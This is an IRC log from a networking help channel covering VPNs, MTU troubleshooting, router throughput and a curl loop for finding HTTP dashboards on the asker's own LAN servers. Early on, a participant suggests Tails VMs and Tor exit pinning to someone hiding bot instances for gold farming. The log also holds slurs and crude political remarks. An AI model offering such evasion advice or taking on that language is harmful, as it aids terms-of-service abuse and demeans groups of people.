14:44 < djph> sparrowsword: now, since they're "somewhere on the internet", when you connect to them and test your public IP, the site you use (ipchicken, whatever) sees the request coming from PIA (etc.)
14:44 < ne2k> sparrowsword, perhaps you ought to explain what it is you are ACTUALLY trying to do. it may be possible to offer a solution that doesn't involve any of this. !xy
14:44 < lupine> run yo own
14:44 < sparrowsword> djph: okay... so for in order for my vpn to work... i need to have the raspberry pi at a different location
14:45 < djph> sparrowsword: or have the "testing computer" itself at a different location.
14:45 < sparrowsword> right
14:45 < sparrowsword> so proxies it is?
14:45 < sparrowsword> dedicated proxies*
14:45 < sparrowsword> or vps...yeah
14:45 < djph> sparrowsword: here's the thing though, a VPN isn't really *intended* to do this kind of proxying.  I mean, it can and does ... but that's like saying a 1k horsepower musclecar is a "family car"
14:46 < sparrowsword> hence proxies
14:46 < sparrowsword> what im trying to do is hide all my hardware
14:46 < sparrowsword> or masquerade it
14:46 < djph> use a NAT router, done.
14:46 < ne2k> sparrowsword, it depends what you are actually trying to do this for. perhaps you want to test accessing a service you are running at your location from outside. perhaps you want to prevent your traffic being tracked. perhaps you are just doing it for fun. please tell us what you are actually trying to do this for
14:47 < sparrowsword> prevent it from being tracked, trying to start goldfarming
14:47 < djph> I mean, "hardware" information (MAC address) doesn't traverse NAT.
14:47 < djph> (granted, some javascript can always ask the browser for that info)
14:48 < sparrowsword> not using a browser
14:48 < sparrowsword> using a .jar
14:48 < sparrowsword> or .exe
14:48 < djph> the point being, *a program* can always tell you what it's running on.
14:48 < sparrowsword> no idea what port is being used
14:48 < sparrowsword> even with vpn?
14:48 < djph> since, well, it's physically on the machine.
14:49 < ne2k> sparrowsword, what are you trying to prevent from tracking what?
14:49 < djph> a VPN just moves traffic points, kinda like taking a detour when the freeway is being worked on.
14:50 < sparrowsword> i want to run this .exe/.jar on 5 instances having no apparent connection to the computer running it, hate to say it, but kinda like a botnet
14:50 < ne2k> sparrowsword, spin up five VMs with tails.iso, run in that
14:50 < sparrowsword> djph: so the destinations are still the same? from A to B?
14:51 < sparrowsword> ive heard of / used tails very very very briefly before.. does it allow dedicated ips?
14:51 < sparrowsword> i mean i dont think it does...
14:51 < sparrowsword> since it runs live
14:51 < ne2k> dedicated IPs?
14:51 < djph> sparrowsword: yeah, but the route changes.  (and ofc, when we throw masquerade into the mix, other things "look" different)
14:51 < sparrowsword> i need static ip addresses...
14:51 < ne2k> sparrowsword, you can pin to an exit node in tor
14:51 < sparrowsword> oh?
14:52 < sparrowsword> onion router?
14:52 < ne2k> https://www.torproject.org/docs/faq#ChooseEntryExit
14:52 < ne2k> sparrowsword, tor is included in tails
14:52 < sparrowsword> interesting
14:53 < sparrowsword> does tails mask hardware?
14:53 < ne2k> anyway, your support has just come to end as you've basically told us that you're trying to do something illegal, so, see ya later, kthxbai
14:53 < sparrowsword> or whatever is running the exe/jar
14:53 < sparrowsword> not really illegal...
14:54 < sparrowsword> do appreciate the help though ne2k: djph:
14:55 < djph> "goldmining", as in "running wow or whatever the fotm-rpg is?"
14:55 < sparrowsword> is it?
14:55 < djph> I have no idea, which is why I'm asking what you meant.
14:55 < sparrowsword> dont think its illegal... just not in the terms of service... so frowned upon, but not illegal
14:56 < sparrowsword> as far as i am aware
14:56 < ne2k> djph, goldfarming, afaik, is running bots to earn in-game currency so that you can then sell it for real money
14:56 < djph> ... i mean, if that's what you're doing; you're a douchenozzle and should be mercilessly hunted and murdered by every player of whatever game it is (ingame, of course).
14:56 < sparrowsword> so if i bought gold is that illegal too?
14:57 < sparrowsword> perhaps im just creating alternate accounts for myself?
14:57 < ne2k> sparrowsword, anyway, clear off
14:57 < djph> ne2k: far as I've ever seen, trading real money for "ingame items" isn't breaking any laws.  Ingame rules, sure.  Not to mention they're shady as all fuck, and now in addition to your gold, you've also bought several swedish-made penis enlarging pumps.
14:58 < sparrowsword> loL
14:58 < agent_white> Mornin' folks
14:58 < sparrowsword> djph: ^
14:59 < sparrowsword> ne2k: *
14:59 < djph> with the (afaik) only real legit one (at the time I still played MMOs) having been Eve Online, with their ability to sell "game time cards" (30d sub extension for ~$14.99) for ingame money.
14:59 < sparrowsword> yeah... arcage
14:59 < sparrowsword> did the same lolz
14:59 < sparrowsword> redefining P2P
14:59 < ne2k> djph, computer games are a waste of computers
15:00 < djph> but they were CRAZY strict with it -- to the point where if you scammed the GTC sales, you get permabanned.
15:00 < ne2k> agent_white, 14:00 but hey
15:00 < djph> ne2k: meh, Eve was really more a spreadsheet frontend than a game.
15:02 < djph> ne2k: but yeah, I don't have time for that fun either.
15:03 < sparrowsword> eve was fun tho
15:03 < djph> sparrowsword: short version - don't.  Long version - goldsellers/buyers should all be mercilessly hunted to extinction, they're the bane of any games economy.
15:03 < sparrowsword> the game im playing actually cant function without them...
15:03 < djph> yeah, it was, until the WoWtards ruined it (also, Greed is Good).
15:04 < sparrowsword> its why they stopped chain banning...
15:04 < djph> then the devs have to put in proper floor / ceiling items (e.g. the racial shuttles in Eve) to keep the economy from going too tits up.
15:06 < djph> but in either event, it's not a "networking" thing.
15:06 < johnwick200> hello!
15:07 < johnwick200> so my isp company have an offer of 200mbps
15:08 < johnwick200> well im connected with fttc
15:08 < johnwick200> fiber to the cabinet
15:08 < johnwick200> so i have other 250 meters of coaxial cable
15:08 < johnwick200> how is possible from this 250 coaxial cable to pass up 50 mbps?
15:08 < johnwick200> close to 100
15:10 < dogbert_2> hey djph
15:18 < djph> johnwick200: what?
15:18 < djph> hey dogbert_2
15:19 < dogbert_2> what is new?
15:19 < djph> johnwick200: DOCSIS 3.x can do 1gbps or better ... IIRC it's something like ~40 mbps per channel (and it bonds up to 32 channels or something)
15:19 < djph> not much here dogbert_2; you?
15:21 < dogbert_2> same here, gonna get into the shower
15:28 < superkuh> Plenty of bandwidth in a coax cable that can pass up to 2.5 GHz. Even just the normal <100 MHz channel.
15:28 < superkuh> Er, s/channel/span/
15:30 < superkuh> http://x264.nl/dump/ziggo_docsis3.0_2018-03-23-full-spectrum.jpg
15:39 < wind_swept> i have an HP C7000 blade chassis which keeps shutting down certain ports for what HP support claim is a "broadcast storm"
15:39 < wind_swept> no other devices on this subnet / vlan appear affected, including other C7000 chassis, though those are located on separate physical switches
15:41 < lithiumpt> humm, maybe PSU problems?
15:42 < wind_swept> power supply?
15:42 < lithiumpt> yes
15:42 < lithiumpt> aah nevermind
15:42 < lithiumpt> broadcast storm as in
15:42 < lithiumpt> arp broadcast
15:43 < wind_swept> as in broadcast traffic supposedly
15:49 < ice9> there is no 3com routers anymore?
15:49 <+catphish> i doubt it
15:49 <+catphish> in fact i've never seen one
15:50 < ice9> so if we compare 3com vs linksys, both old models, which one is better?
15:50 <+catphish> i think you'd have to compare the devices, not the manufacturers
15:59 < djph> although, it also depends *when* the devices were made.  I mean, for a while there 3com was (IIRC) pretty highly reputable.  Linksys has had good models (WRT54G), but well, one of many isn't that great of a track record.
16:00 <+pppingme> 3com was highly reputable in the enterprise market, their consumer stuff was junk
16:00 < Fieldy> ^
16:03 <+catphish> yeah, i remember 3com being a good brand, but looks like they made cheap stuff too, probably similar quality to any other soho gear
16:04 < djph> pppingme: ah, I never saw their stuff in "consumer" arenas (but then again, they were near on dead by the time I was consciously in networking)
16:05 < spaces> where are the sexy admins ?
16:05 <+pppingme> most of their superstack stuff seemed ok
16:05 <+pppingme> spaces I'm here
16:05 < spaces> pppingme good, now someone sexy :P
16:05 < lupine> clearly me
16:05 < djph> I think he's looking for the goatse guy ... or maybe tubgirl
16:06 < spaces> lupine clear === virginity ?
16:06 < spaces> djph you are just jalous :P
16:06 < lupine> not in any language I know
16:06 <+catphish> spaces: could you maybe just stop being weird?
16:06 < lupine> have a sexy picture: https://github.com/lupine
16:06 < spaces> lupine maybe as Brandson
16:06 < spaces> oh damn can we handle that ?
16:07 < lupine> doubtful
16:07 < spaces> my PC is haviung dififculties rendering that photo, it tries to block it
16:08 < spaces> catphish yeah I try :)
16:08 < djph> lupine: I don't even want to know ...
16:09 < spaces> djph it makes you curious doesn't it ?
16:09 < djph> lupine: ... I mean, internet-senses are tingling, and I'm expecting it to redirect to http://goatse.cx or something.
16:09 < lupine> it's just my github profile pic, from before I got a bit fat :p
16:09 < spaces> the right moment to idle on any social media as well :P
16:10 < spaces> IRC is the way to go then
16:10 < spaces> meh my coffee @ 3pm kicked in werid
16:10 < spaces> weird
16:11 < spaces> I need to collect hay in about 2 hours
16:11 < spaces> 200 packs at least
16:14 < djph> lupine: that's not nearly as fun as the deeply-ingrained reaction to most (every) link posted by someone else.
16:15 < djph> lupine: it's probably enough that in our current left-wing libtard society, I should be screaming how you're promoting hatespeech and I need a safe space to protect me from the images... or ... something like that ... maybe?
16:19 <+catphish> lol @ libtard society
16:23 < djph> catphish: better than the UK at the moment (errr, if news isn't just trying to be inflammatory ... which it may well be being)
16:24 <+catphish> i have no idea, you can't compare a country you're in to another country based on international news
16:24 < djph> yup
16:25 < djph> I mean, I'm only ever gonna see the "big" stuff
16:26 <+catphish> indeed
16:27 <+catphish> most international news about the USA these days is the president doing something retarded, dunno about the UK, i assume something about brexit
16:27 <+catphish> we're really screwing ourselves on that one
16:28 < kuahara> hey, catphish can I pick your brain on something this morning
16:28 <+catphish> we didn't really have much political polarization until brexit, now it's (hopefully temporarily) awful
16:28 <+catphish> kuahara: ytes
16:28 <+catphish> *yes
16:28 < djph> maybe, maybe not.  Seems EU's kinda sending themselves down the crapper.  TBH, most of the international news I see is "ohwait, open borders for middle-easterners was a bad idea"
16:29 <+catphish> oh yeah, i forget america thinks the UK is being overrun by dangerous muslims
16:29 < kuahara> I brought this question to the channel yesterday.   https://pastebin.com/id1EuYaU    and qman__ suggested a problem in utilizing SMB that might be causing this.  Just curious what you think.
16:29 < regdude> does anyone knows when UK will leave EU? Just wondering when ordering stuff from there will cost a fortune
16:30 <+catphish> regdude: 29 Mar 2019
16:31 < djph> catphish: nah, that's just the news slant on it (also "was overrun" -- past tense)
16:31 <+catphish> regdude: unless agreed otherwise, and frankly, it doesn't seem like we can agree our way out of a paper bag
16:31 <+catphish> the reality is that most of our immigration problem (if you believe immigration is a problem which many people do) is from cheap labourers, not religious crazies
16:32 < regdude> aren't you happy that you can have sub-primates do the dirty work for you for a slice of bread?
16:33 <+catphish> there's not much religion here to speak of, i always find it ironic that the UK (a country with an official religion) has almost no religious involvement in politics, whereas the USA (a country with laws against interference of religion in politics) seems to have a lot more of it
16:33 < kuahara> For what it's worth, I am having the same problem this morning in 2 out of the 3 test counties.  The 3rd one is working fine.
16:34 <+catphish> like, politicians here would never mention their religion, and while some poeple have a bit of a fear of eastern religion, you wouldn't win any votes by being a christian :)
16:34  * catphish looks at kuahara's wall of text
16:34 < kuahara> it's a small wall  =o
16:35 <+catphish> kuahara: i'd put 1 of my british pounds on it being an MTU issue
16:36 <+catphish> put some aggressive MSS clamping on the vpn server
16:36 < kuahara> is it easy to resolve?
16:36 <+catphish> yes
16:36 <+catphish> if i'm right
16:36 < djph> catphish: it's the other way around.  "Separation of Church and State" isn't "religion can't sway you" it's "the state leaders cannot ALSO be religious leaders" -- as opposed to The Church of England, etc.
16:36 <+catphish> you just need a firewall rule to limit the TCP MSS on packets going through the vpn
16:36 <+catphish> djph: that makes sense
16:36 < kuahara> Can I set such a rule in Windows Firewall?
16:37 < kuahara> Also, would that explain why the problem seems intermittent on 2 of the 3 test machines?
16:37 <+catphish> djph: i guess that's why you can't have the state trying to indoctrinate children into any particular religion in schools, etc
16:37 < kuahara> My home PC for example had this issue once, but all other days I tested, it worked fine.  My work PC had this problem every other day.  The public workstation that the user initially called in about has the problem religiously, every day.
16:37 <+catphish> kuahara: i'm not sure about windows firewall
16:37 < lupine> in .uk, state schools have a legal duty to inculate christianity into their children
16:37 < lupine> acts of christian worship, etc
16:38 <+catphish> lupine: actually we have different schools with different religions, but many are "church of england" and do indeed teach christian worship
16:38 < djph> catphish: well, that's actually more recent, with (IMO) crazies who were pissy we'd have prayer in class (or not) depending on the teacher / class / whatever. (Or prayer services - even if 'nondenominational' - for a kid killed in a horrific accident / cancer / etc.)
16:38 < dw5304> good morning guys i have an issue with a cisco asa 5510 with an ipspoofing related issue and was looking for some help as to how to fix it. from inside the network if we attempt to goto a wan address that is routed to us from upstream im getting a IP spoof denied message, that said ip spoofing is disabled and was looking for a littel insight on how to fix it.
16:38 < lupine> catphish: I am referring to non-religious schools, owned and operated by local authorities
16:38 < kuahara> I'll call the clerk's office and see if they have a hardware firewall I can get access to
16:39 < lupine> as distinct from religious schools, owned and operated by local religious communities such as the church of england, catholics or muslims
16:39 <+catphish> lupine: well they can practice whatever religion (or none) that they want, we have muslim schools, christian schools, probably atheist schools
16:39 < lupine> they are actually exempt from thw requirement, IIRC
16:39 < lupine> catphish: right, but the official state schools *must* inculate christianity
16:39 < lupine> it is their legal duty to do so
16:39 < djph> catphish: although, I really haven't done much research into it; barring seeing *some* news coverage lately that teachers are apparently trying to indoctrinate islam.
16:39 <+catphish> lupine: that seems plausible
16:40 <+catphish> lupine: most state schools i see are christian, it is our official religion (lols)
16:40 < lupine> yeah
16:40 <+catphish> i don't thin many take it very seriously these days though
16:40 < lupine> no. we're an official theocracy and it has concerete implications for our schooling and other systems
16:40 <+catphish> and luckily, regardless of what religion they practise, they have a more serious legal duty to teach about all religions
16:41 <+catphish> my school was christian, all but about 2 students there thought it was retarded
16:41 < kuahara> catphish they have a cisco meraki firewall
16:41 <+catphish> so i'm not particularly worried about it
16:41 < kuahara> The fix can be implemented there?
16:41 < jackbrown> Something that I still don't understand can you help me ? I'll explain
16:41 <+catphish> kuahara: probably not, depends where the VPN endpoints are
16:42 < djph> jackbrown: ask away
16:42 <+catphish> kuahara: it has do be done somewhere the traffic isn't encrypted
16:42 < kuahara> The is on the client's networko by the way, not ours.   The VPN endpoint is inside our datacenter.  I have no idea what they are using.  Our parent company actually owns the datacenter.
16:42 < jackbrown> Smartphone : Xiaomi Mi5 connected in front of the router 5Ghz 433Mbps, trying to transfer a file from the USB attached hard drive (it's 3.0 and the router has 3.0 port )  I only get 5 Megabyte per second.  Is that normal ?
16:43 < jackbrown> Router FRITZ!Box 7490
16:43 <+catphish> lupine: as long as theresa doesn't start thinking anything can be solved with thoughts and/or prayers i'll be ok
16:43 < djph> jackbrown: USB is CPU-limited ... I imagine your router has a pretty shit CPU.
16:43 < jackbrown> djph, it's a FRITZ!Box 7490
16:44 < kuahara> catphish we have lots of cloud based customers that operate out of that same datacenter, though.  They are spread across multiple counties in Texas.  Only this 1 customer on this 1 PC has this issue.   Does that still lend itself to the idea of this being an MTU issue in our datacenter?
16:44 < djph> jackbrown: not to mention actual capabilities of the phone itself, whether or not you're holding it wrong (note, typically limited to Apple iDevices), etc.
16:44 <+catphish> jackbrown: there are loads of likely bottlenecks there, i'd always test the wifi speed before anything else
16:44 < jackbrown> djph, https://wiki.openwrt.org/toh/avm/fritzbox.7490
16:45 <+catphish> kuahara: the MTU issue can be caused anywhere along the route, it could be at either end, or between
16:45 <+catphish> most likely at the customer end
16:45 < kuahara> so can I fix this on their firewall instead of our datacenter's?
16:45 <+catphish> if it's suddenly happening to lots of customers, i admit it's less likely
16:45 < djph> 500MHz dual-core proc -- yeah, that's pretty slow ;)
16:45 < dw5304> sure is :)
16:45 <+catphish> kuahara: anywhere on the route where the traffic isn't encrypted
16:45 <+catphish> kuahara: even on the client PC
16:46 < jackbrown> djph, really? does it limits just USB ?
16:46 < kuahara> catphish well. I can log into this 1 customer's product from a completely different county, pull up the same case in our software, and reproduce the problem here.  I am more than a hundred miles away from the customer.
16:46 < djph> jackbrown: well, it limits *everything* that's reliant on the CPU
16:46 < jackbrown> djph, or for example if I have a 500Mbps incoming from internet I'll have the same issue?
16:46 < kuahara> But 0 other customers have this issue. and we have customers in 70 counties
16:46 <+catphish> kuahara: i could of course also be wrong
16:46 < dw5304> catphish have you guys looked at mms yet?
16:46 < kuahara> the traffic is not encrypted by the way
16:46 <+catphish> but it's an easy fix to test on one client
16:46 < jackbrown> djph, why does it have 3.0 USB ports  then ?  Doesn't make any sense  don't you find ?
16:47 <+catphish> dw5304: no, i don't even have sms
16:47 < djph> jackbrown: depends - many router chips tend to have a "routing processor" that's separate from the CPU.  Think using an nVidia graphics card instead of intel onboard (etc.)
16:47 < kuahara> This is a public viewstation and everything it has access to is public information
16:47 < dw5304> catphis mms is not sms :)
16:47 <+catphish> no it's not
16:47 < jackbrown> djph, ok I got the concept but i don't undersand why it has 3.0 usb port
16:47 < kuahara> how would I fix it just on that 1 machine?
16:47 <+catphish> dw5304: but it's related :)
16:48 < djph> jackbrown: cost; because bigger is better; because consumers; because everyone else does it; because any number of reasons
16:48 < jackbrown> djph, this is a really serious brand  it's german a lot of good reviews
16:49 < dw5304> jackbrown, if u want fast transfer speeds have a dedicated device to it something thats not doing everything else speeds will drop depending on what is being used on it... some times mfg just suck
16:49 < dw5304> when it comes to cpu related things
16:50 < kuahara> I issued "netsh interface ipv4 show subinterfaces" on the problem machine.  It shows 6 entries and the MTU is 1500 in all cases.
16:50 < djph> jackbrown: so? they can have "meh" models just as well as good ones.
16:51 < jackbrown> djph, meh ?
16:51 < kuahara> The MTU is 1500 in all 3 counties where I am testing.  Things are only working properly in 1 of those counties right now.
16:52 < kuahara> On my home and work machines, I have some entries that are 1300 and 1400, but the openvpn interface is 1500 on all of them.
16:54 < dw5304> anyone able to help with a cisco asa 5510 ip spoofing related issue?
16:56 <+catphish> kuahara: right, so the VPN is trying to send 1500 byte packets, but if anything along the way is smaller than that, it will break
16:56 <+catphish> kuahara: you can probably do a quick test fix by setting the MTU on the vpn interface to 1200
16:57 <+catphish> that's how i normally test this, it's not the right fix, but it's a quick way to test
16:57 < SoniEx2> can we fix the web yet? https://cybre.space/@SoniEx2/100265981412168793
17:01 <+catphish> SoniEx2: LTE cells don't see plain data?
17:05 < SoniEx2> catphish: no, core network data (MME/NAS messages) are encrypted separately
17:05 < djph> jackbrown: essentially "nothing special".
17:05 < djph> jackbrown: (e.g. "cheap" or "poor quality")
17:05 < SoniEx2> so the LTE cell can't read your texts
17:06 <+catphish> SoniEx2: that's cool
17:06 < SoniEx2> idk about IP
17:06 <+catphish> SoniEx2: nothing could be worse the GSM :)
17:06 <+catphish> no authentication of the provider at all
17:07 <+catphish> i wonder if there are downgrade attacks against LTE to get people onto an unauthenticated GSM network
17:07 < nickster> so brocades require a license to use sfp+
17:07 < SoniEx2> yes
17:07 < djph> catphish: "probably"
17:07 <+catphish> i suspect there are, since
17:07 < SoniEx2> I use them
17:07 <+catphish> *since phones will fall back to that if they fail to connect to LTE
17:08 <+catphish> so all you have to do is break it
17:08 < nickster> anyone got any recommendations for a switch with 4 sfp+ and some normal gigabit
17:08 < SoniEx2> actually I'm in the middle of testing one
17:08 <+catphish> nickster: those are absurdly expensive :(
17:08 < nickster> like $200-$250 is the cheapest from what im seeing
17:08 <+catphish> yeah
17:09 < nickster> https://www.ebay.com/itm/CISCO-WS-C4948-10GE-48-Port-Gigabit-Layer-3-Switch-entservices-15-0-ios-4948-10G/263234706193?epid=74127873&hash=item3d4a02db11:g:WDIAAOSwurVZzSS0
17:09 < nickster> too bad the brocade one is like $150
17:09 <+catphish> i have a couple of netgear ones, i use netgear switches for everything, and they're the only people to have a sanely priced device with 4 x SFP+
17:09 < dw5304> nickster look into CRS328-4C-20S-4S+RM
17:09 < SoniEx2> we'll see if my attacks on LTE work
17:09 < SoniEx2> :)
17:09 < djph> nickster: sounds a bit ... specialist.  I mean, for a couple hundred you can get 48 copper + 2-4x SFP (or 2/2 SFP/SFP+)
17:09 <+catphish> though these days i'd probably look for a second hand juniper
17:10 < kuahara> ok, so I did the test  using ping 4.2.2.2 -f -l 1272    and I get successful responses.  As soon as I bump it up to 1273, it errors out saying the packet needs to be fragmented but DF set.
17:10 < kuahara> (sorry, had to afk for a bit, just now getting to this)
17:11 < kuahara> Random google result says that I shouldn't be setting MTU below 1400.  So what's the right answer in this case?
17:11 < kuahara> I guess I need to set the MTU to 1272 and see if this image works real quick as well.
17:11 <+catphish> kuahara: anyone that says you shouldn't set the mtu below 1400 is just plain wrong, there's nothing special about 1400
17:12 <+catphish> but setting a low MTU is a good way to test if you have a problem with packet sizes
17:12 <+catphish> what you actually need to set it to is more complicated, but get it tested first
17:12 < lupine> pmtudisc
17:12 < lupine> what the endpoint mtu is doesn't matter very much
17:12 <+catphish> kuahara: if ping stops at 1272 the your mtu is already quite low
17:13 <+catphish> and probably negotiating properly
17:13 <+catphish> if it's not that then it's something in windows and i wouldn't like to guess :(
17:15 < kuahara> I looked at the MTU on the openvpn interface via the windows gui and it showed it was set to 1500 by default only.  Not sure any negotiating happened.  I also changed it to 1272 using that same interface.  Not sure if you're a Windows person or not, but will setting it via the GUI be persistent?
17:16 < kuahara> ugh... well... this does not solve the problem.
17:16 < kuahara> I guess I can try setting it lower than 1272 instead of putting it right at the max
17:21 < kuahara> I've set MTU all the way down to 1200.  This image is still taking forever to open via our software.  When I open the same document via Adobe reader by browsing into the share and just double clicking on it, it opens instantaneously.
17:21 < dw5304> sounds like a software bug
17:22 < kuahara> it would sound that way, except this exact same software is running in the same configuration, connected via the same VPN, on test machines in other locations, opening up the same civil cases, and viewing the same document without issue.
17:22 < kuahara> we've reinstalled it from the ground up just to rule that out, too.
17:22 < dw5304> how about the age of the machine thats running the software?
17:23 < kuahara> and removed all the various protection software for testing.  Turned off firewalls, removed antivirus and antimalware software, etc...
17:23 < Poster|n> Are you running a standard 1500 MTU on the server at the datacenter?
17:23 < kuahara> Poster|n I would imagine so, I don't have access to that.  The image itself is sitting on a Buffalo Terrastation.
17:24 < Poster|n> Ok yeah probably running 1500 there, I've had some issues where a large packet was sent that needed fragmentation to traverse a VPN link.  If ICMP fragmentation needed is not permitted, the connection will seemingly "freeze"
17:24 < kuahara> I don't want to go changing the MTU there right now anyway because I noticed when I changed it on the VPN interface on the client machine that it was disconnecting the VPN for a few seconds, then reconnecting
17:25 < kuahara> if I did that server side, I'd be disconnecting a lot of customers during business hours.  It wouldn't go well.
17:25 < kuahara> Poster|n the image loads, it just spends 40-60 seconds loading before the first page of it shows up.  Another 10 seconds go by and the 2nd page shows up in our document viewer.
17:26 < kuahara> I guess what confuses me is that when different software requests the same document over the same connection, it's received in 1-2 seconds instead of 40-60 seconds.
17:26 < Poster|n> Yeah something else may be in play, are you able to install wireshark on an impacted client?
17:26 < kuahara> I can.
17:27 < kuahara> it's already installed there.
17:27 < kuahara> I'm no pro with wireshark though.
17:27 < dw5304> when you open this is it on the same computer?
17:27 < Poster|n> might give that a shot to see if you're getting any indicators there, also take a closer look at the OpenVPN logs, make sure the connection isn't getting reset, especially if you're using the same cert/key in multiple places, by default OpenVPN only permits 1 connection per certificate
17:27 < kuahara> dw5304 open what?
17:28 < dw5304> when you are opening this in adobee
17:28 < dw5304> is it on the same machine
17:28 < dw5304> or different
17:28 < kuahara> The document lives on a server in a datacenter somewhere else, not on the client machine.
17:28 < kuahara> If I move the document to the client machine and use the same document viewer to open it, it loads instantly.
17:28 < Poster|n> I had inadvertently had the same certificate/key installed on a old and new (replacement), the end result was that they would "ping pong" their VPN link causing all sorts of trouble
17:28 < dw5304> have you considerd their bandwidth is slow?
17:29 < kuahara> The bandwidth was pretty good when I tested it.  I think it was 80up/down.  Also, I did a large file transfer between that PC and the file server and could sustain a 45Mbps connection for a long period of time in both directions with almost no variance.
17:30 < Poster|n> Do you have access to a Windows or UNIX host at the same location which you can install/run iperf?
17:32 < kuahara> I may, but give me a minute.  I know it's a longshot, but I'm noticing 2 different versions of openvpn are installed at the client machine and it's a different version than what I am running on my work machine.
17:32 < kuahara> The client machine was using a newer version and a separate TAP installer.
17:33 < Poster|n> you may also try a continuous ping to the Buffalo Terrastation while testing to see if you get any indications of packet loss or a latency spike
17:39 < jackbrown> Is there a test I can do to check my Wireless router file transfer speed within my home LAN ? I can connect to it a smartphone in 5Ghz  433Mbps
17:39 < jackbrown> thanks
17:40 < kuahara> There's a freeware app you can use.  lanspeedtest, server and client versions
17:40 < Poster|n> iperf is another option as well
17:43 < kuahara> wait.. if I set the MTU on the openvpn adapter to 1272, do I also need to do that on the primary ethernet adapter?
17:43 < kuahara> just hit me that I didn't do that when testing earlier
17:44 < kuahara> also, with the openvpn reinstall, I can ping 4.2.2.2 -f =l 1472 and get replies
17:44 < kuahara> -l  *
17:45 < kuahara> just using a different, slightly older version of openvpn.   Problem still persists with this version, though.
17:47 < kuahara> I guess on the adapter for the physical nic, there's no option to adjust the MTU
18:01 < dw5304> Deny IP spoof from (63.246.10.X) to 63.246.31.X on interface outside looking for any insight as to how one can fix this :)
18:29 < jackbrown> kuahara, thanks
18:52 < wtflux> hey guys i just ran a port scan across two of my servers for all open ports, is there an easy way to "check" all the ports to see which ports are "serving" http dashboards? for example i know i have a vray license server on port :30304 but what about printers, other license servers w/ http dashboards, etc. is there an easy way to "loop" thru these and check for dashboards?
18:53 < wtflux> i understand that HTTP doesnt have to be served thru port 80 especially on LAN servers such as these, but thats where i run into trouble, how to check if HTTP is running on non port 80 ports?
18:55 < Poster|n> if it's truely http, you should be able to just issue an HTTP GET, if you're running from a *n?x host, you could loop a curl for a list of ports, something like;
18:55 < Poster|n> for n in 80 8080 8100 30304; do curl -v http://192.168.10.100:${n} ; done
18:56 < Poster|n> only those running http will respond
18:56 < Poster|n> well, with an HTTP reponse that is
18:56 < varesa> might want to keep a lookout for those listening to HTTPS as well
18:57 < wtflux> Poster|n: the part -v http://192.168.10.100:${n} ; is the ip of the server right?
18:58 < wtflux> Varesa whats the difference between serving http and listening?
18:58 < wtflux> none?
18:58 < varesa> eh, serving is more what I meant
18:58 < wtflux> I would just be adding HTTPS as well as HTTP to my list of services im checking for?
18:58 < varesa> the point being HTTP vs HTTPS :)
18:58 < Poster|n> yeah sub in your IP of interest for 192.168.10.100
18:59 < Poster|n> if you have a list of addresses in a file called "serverips" you could nest it;
18:59 < wtflux> Ok i get it, but i still dont know what listening is exactly. I hear it thrown around from time to time, is it simply an "address" that is checking or accepting connections across a port? in a "waiting" state?
18:59 < Poster|n> for server in $(cat serverips); do for n in 80 8080 8100 30304; do curl -v http://${server}:${n} ; done ; done
18:59 < varesa> yeah, listening to port is accepting client connections on said port
19:01 < wtflux> Poster|n: last question, because im very noob to linux shell scripts, the bit in the for loop "for n in 80 8080 8100 30304" the numbers are the ONLY ports that will be looped thru? Is there any way i can do 80-65535 ?
19:02 < wtflux> in fact i only wrote my first shell script last friday thats how green i am
19:03 < Poster|n> yeah it is, you can include all but it will produce a lot of output, adjust it to be "for n in $(seq 80 65535)
19:03 < Poster|n> it will try to run curl 65455 times per host
19:04 < Poster|n> you can test seq at your shell, type "seq 1 100" and you'll see it print each number between the first and second argument
19:11 < buu> Does nmap seriously not check for this?
19:11 < buu> This seems like an nmap thing
19:12 < buu> Also there's no reason not to do curl $ip:$port &
19:13 < buu> Also I have this old ass chelsio t320/n320 that only does like 7.5gbps under debian, anyone happen to have some experience making it go faster?
19:14 < Poster|n> nmap can certainly do port scans, I am unaware of a way to make it initiate an http GET or POST natively.  I also don't believe it will natively check all 65535 ports (or a large continuous port range) natively, but you can force it to do so with -p 1-65535 or similar
19:16 < varesa> https://nmap.org/book/man-version-detection.html
19:19 < Poster|n> if I am understanding that page, they are correlating port numbers to services, wtflux is looking to find HTTP daemons running on non-standard port numbers which is what prompted the usage of curl
19:19 < varesa> Poster|n: read further
19:20 < varesa> it opens a bunch of connections and tries to talk to the service in order to identify the responding software
19:20 < Poster|n> oh neat
19:20  * Poster|n stands corrected
19:20 < varesa> but it looks like it indeed tries to identify the actual application, not the protocol
19:20 < varesa> like it'll say nginx/httpd/etc..
19:21 < varesa> but I tried it against a java application running at 8080, it couldn't figure out what it is (despite talking HTTP to it)
19:21 < Poster|n> yeah it may be leaning on service banners/headers
19:22 < varesa> yeah
19:23 < varesa> I like this: "By default, Nmap version detection skips TCP port 9100 because some printers simply print anything sent to that port, leading to dozens of pages of HTTP GET requests, binary SSL session requests, etc."
19:23 < skyroveRR> lol
19:23 < skyroveRR> New for me :D
19:24 < skyroveRR> And exciting :D
19:24 < varesa> I can imagine 20 printers around a building just starting to spew some random code like crazy
19:25 < varesa> and the helpdesk once the calls start coming in various locations
19:25 < Poster|n> bonus points if you go through a ream of dot matrix paper
19:25 < xtrWrithe> varesa: like 15 years ago xD
19:35 < Phil-Work> catphish: thanks (belated)
19:51 < admiralspark> So
19:51 < admiralspark> How do you all deal with documenting ACL's?
19:52 < admiralspark> Just make a table with the rules?
19:52 < admiralspark> looking for a sane way to map this out
19:55 < varesa> documentation, what's that?
19:55 < admiralspark> hahaaaaaaaa
19:55 < admiralspark> tell me about it
19:59 < purplex88> can a server connect to my computer?
20:00 < DoctorDick> Yes
20:00 < purplex88> e.g. can server request my computer for connect
20:00 < purplex88> or is always client makes first connection request
20:00 < varesa> depends on how you define server/client
20:01 < varesa> you need one end that listens on a port and another end that initiates the connection to that port
20:01 < purplex88> opened ports = listening ports?
20:02 < purplex88> suppose my computer has an opened port at 4040
20:02 < purplex88> it has nothing else..
20:03 < purplex88> can my computer still connect to something?
20:03 < purplex88> if it has no application
20:03 < purplex88> no browser, no client app, no skype etc. no software
20:03 < purplex88> can it make a connection?
20:03 < varesa> the operating system might still have programs that open connections
20:04 < DoctorDick> If there's no software, there's no OS
20:04 < DoctorDick> Because an OS is software
20:04 < purplex88> it has OS
20:04 < purplex88> but say someone knows my local ip address
20:04 < purplex88> can they connect to my computer?
20:05 < DoctorDick> No
20:05 < purplex88> in background
20:05 < DoctorDick> Unless that person is on your local network
20:05 < xtrWrithe> purplex88: as long you run some OS , there will be a TCP/IP stack working
20:05 < purplex88> yes the person is in my local network
20:05 < varesa> they could however just scan the whole address range
